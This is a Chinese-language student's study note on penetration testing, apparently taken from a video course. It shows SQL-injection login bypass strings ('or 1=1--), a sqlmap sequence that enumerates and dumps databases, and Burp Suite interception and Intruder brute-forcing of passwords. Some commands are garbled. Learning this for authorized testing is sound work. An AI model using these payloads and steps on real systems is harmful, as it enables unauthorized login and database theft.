小白學滲透,超詳細教程筆記~《繞過密碼登入》原視訊是我們老師課上給看的B站up主“知黑科技”的系列教程:2019超詳細 滲透測試/黑客入門/漏洞學習
探測順序:(注入六連)
1、Sqlmap -uhttp://www.xx.com?id=x(查詢是否存在注入點)
2、--dbs(檢測站點包含哪些資料庫)
3、--current -db(獲取當前的資料庫名)
4、--tables -D”db_name”獲取指定資料庫中的表名(-D後 接指定的資料庫名稱)
5、--columns -T”table_name” -D ”db_name”(獲取資料庫表中的欄位)
6、--dump-C”columns_name”-T ”table_name”-D “db_name”(獲取欄位的資料內容)
一、在使用者欄輸入:’使用者名稱’or 1=1--。進入MySQL介面,可以看到password是多少
->從使用者框輸入:’使用者名稱’or 1=1 -- |
(1) 常用的萬能密碼:’or’=’ or’ 、’or 1=1-- 、’or 1=1/*;
(2) 登入SQL的語句:select *from admin where username =’使用者輸入的使用者名稱’ and password=’使用者輸入的密碼’;
(3) SQL語句:select *from admin where username =’’or 1=1—and password=’使用者密碼’;
二、滲透
1、用BURP(爆破軟體)探測,進行抓包;
2、選擇對應測試物件;
3、在BURP設定代理(為了抓包);
點AdvanLed->Network->Setting中第四個->關閉;
4、到BURP選單欄選options(第二行裡)
5、檢視是否為登入IP地址的對應網站;
如果原地址有誤則出現MySQL報錯
不報錯是:……php?id 1=1 |
6、選Intercept截斷(登陸就能顯示到抓包);
7、轉向網站輸入密碼:是正確密碼直接就進去了,是錯誤密碼就進行抓包、爆破。
8、Intecept中的Raw是抓到的包的資料;
9、把抓到的包進行傳送處理:可直接點選Intercept中的Action就能傳送到intruder模組了;
10、選intruder->2->Sand to Intrillder
點選Positions中的Attack type:選sniper對包資料內容進行包探測,對密碼xxx進行探測。
對密碼xxx進行探測
11、在探測完之後的頁面,
12、proxy(是代理)下有Intercept;
(1) 源地址有誤報錯;
(2) 源地址無誤不報錯;
(3) 不顯示內容也報錯;
13、演示登陸注入(對登入提交的引數進行抓取、注入)
- 登入後將抓取的資料包copy一下。
- 右鍵選Open Terminal進入root@kali:(下面的)
- 程式碼意思:(進入’Desktop’目錄)(新建一個’Untitled Decument1’類似文字文件的)
- 將複製於內,Save到(桌面)target.txt ,關閉
用sqlmap對剛抓取的內容進行探測,探測是否存在sql注入漏洞,(username –dbs是探測內容)
探測出的cms注入的命令
中間會問三次是否繼續探測(選Y),第四次是是否要測其他,(選N)
Information-scheme是其他資料庫
14、演示CMS注入並獲取對應資料
- (-dbs是對登入網址進行探測)在探測時可以按回車進行加速操作(在加速操作時電腦自動選擇預設)
- 探測cms中的資料庫中資料表
- (-D cms -T articles)探測cms中的資料庫中的欄位
可看到是三個欄位:
(-D cms -T articles -C id,title,content --dump)探測當前欄位中的具體值
可看到三個欄位的對應值:
到此完成使用sqlmap來探測登入框及對應cms(ul)注入並且獲得對應資料。